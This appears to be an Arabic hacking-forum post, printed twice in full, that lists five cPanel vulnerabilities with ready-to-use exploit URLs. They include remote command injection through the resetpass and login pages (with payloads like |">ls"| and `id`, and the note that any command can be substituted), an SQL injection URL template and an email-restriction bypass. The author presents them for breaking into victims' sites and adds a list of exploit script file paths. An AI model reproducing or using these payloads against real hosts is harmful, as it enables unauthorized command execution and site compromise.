السلام عليكم
ثغرات لوحات التحكم الخاصه بالمواقع
الكاتب/شاجع
يلا نبداء
من اقوى الثغرات
cPanel Resetpass Remote Command Execution Vulnerability
الاستثمار
كود:
http://www.example.com:2082/resetpass/?user=|">ls"|
حيث ls
هو امر استعراض الملفات انت تغيره الى اي امر
example موقع المراد اختراقه
الثغره الثانيه لكن ضعيفه
cPanel/Formail-Clone E-Mail Restriction Bypass Vulnerability
الاستثمار
كود:
The following proof of concept has been supplied:
<input type="hidden" name="recipient"
value="user1@offsitedomain.(localdomain)co
m, user2@offsitedomain.(localdomain)com">
^_^
الثغره الثالثه وهي قويه
cPanel Passwd Remote SQL Injection Vulnerability
الاستثمار
كود:
http://www.example.com:2086/******s/passwd?password=<>&domain=<>&user=<>
كووووووووووول
الثغره الرابعه
cPanel Login ****** Remote Command Execution Vulnerability
الاستثمار
كود:
http://www.example.com.com:2082/login/?user=|"`id`"|
حيث example موقع الضحيه ^_*
الثغره الخامسه
cPanel Guestbook.cgi Remote Command Execution Vulnerability
ثغراتها برمجيه
روح لى دوره شاجع في استثمار الثغرات البرمجيه
بلغة البيرل والسي
now
hackers
Hack the world
شاجع
ثغرات لوحات التحكم الخاصه بالمواقع
الكاتب/شاجع
يلا نبداء
من اقوى الثغرات
cPanel Resetpass Remote Command Execution Vulnerability
الاستثمار
كود:
http://www.example.com:2082/resetpass/?user=|">ls"|
حيث ls
هو امر استعراض الملفات انت تغيره الى اي امر
example موقع المراد اختراقه
الثغره الثانيه لكن ضعيفه
cPanel/Formail-Clone E-Mail Restriction Bypass Vulnerability
الاستثمار
كود:
The following proof of concept has been supplied:
<input type="hidden" name="recipient"
value="user1@offsitedomain.(localdomain)co
m, user2@offsitedomain.(localdomain)com">
^_^
الثغره الثالثه وهي قويه
cPanel Passwd Remote SQL Injection Vulnerability
الاستثمار
كود:
http://www.example.com:2086/******s/passwd?password=<>&domain=<>&user=<>
كووووووووووول
الثغره الرابعه
cPanel Login ****** Remote Command Execution Vulnerability
الاستثمار
كود:
http://www.example.com.com:2082/login/?user=|"`id`"|
حيث example موقع الضحيه ^_*
الثغره الخامسه
cPanel Guestbook.cgi Remote Command Execution Vulnerability
ثغراتها برمجيه
روح لى دوره شاجع في استثمار الثغرات البرمجيه
بلغة البيرل والسي
- /data/vulnerabilities/exploits/DSR-cpanel.c
- /data/vulnerabilities/exploits/cpanel-VH.pl
- /data/vulnerabilities/exploits/CPANEL.PL
- /data/vulnerabilities/exploits/jozc.pl
now
hackers
Hack the world
شاجع